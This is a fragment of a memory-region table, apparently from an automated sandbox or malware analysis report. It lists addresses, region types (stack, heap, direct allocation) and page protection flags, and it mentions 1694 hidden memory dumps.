page read and write
|
||
366F000
|
stack
|
page read and write
|
||
E60000
|
heap
|
page read and write
|
||
BD08000
|
heap
|
page read and write
|
||
A0CA000
|
direct allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
602E000
|
stack
|
page read and write
|
||
2965000
|
direct allocation
|
page read and write
|
||
31E3000
|
heap
|
page read and write
|
There are 1694 hidden memdumps, click here to show them.